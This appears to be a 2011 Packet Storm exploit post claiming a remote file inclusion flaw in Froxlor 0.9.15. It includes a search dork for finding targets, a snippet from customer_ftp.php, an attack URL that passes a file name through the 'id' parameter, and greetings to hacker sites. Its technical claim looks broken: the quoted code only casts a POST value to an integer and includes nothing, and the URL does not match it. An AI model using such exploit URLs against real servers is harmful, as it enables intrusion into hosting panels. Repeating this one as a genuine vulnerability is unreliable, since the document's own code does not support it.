Froxlor 0.9.15 Remote File Inclusion

2011-01-26T00:00:00
ID PACKETSTORM:97898
Type packetstorm
Reporter DIES3L
Modified 2011-01-26T00:00:00

Description

                                        
                                            `# Exploit Title: Froxlor v 0.9.15 Remote file include vulnerbility  
# Google Dork: © 2009-2010 by the Froxlor Team  
# Date: 26/1/2011  
# Author: DIES3L  
# Software Link: http://www.froxlor.org  
# Version: v 0.9.15  
# Tested on: ubuntu + win7  
# Email : zxn@Hotmail.com  
#######################################################  
  
Fichier : customer_ftp.php  
http://localhost/[path]/customer_ftp.php  
  
Code :  
<?php  
require ("./lib/init.php");  
  
$id = intval($_POST['id']);  
?>  
  
Exploit :  
http://127.0.0.1/[path]/customer_ftp.php?id= [ DIES3L.txt ]  
NOTE :-  
** ONLY FOR PHP 4.x.x  
  
Have Enjoy :)  
  
##############################################################  
#  
Gr33t'z t0 : #  
WwW.p0c.cc - WwW.D99Y.CoM - WwW.v4-Team.com - ALL My Friends #  
#  
##############################################################  
  
`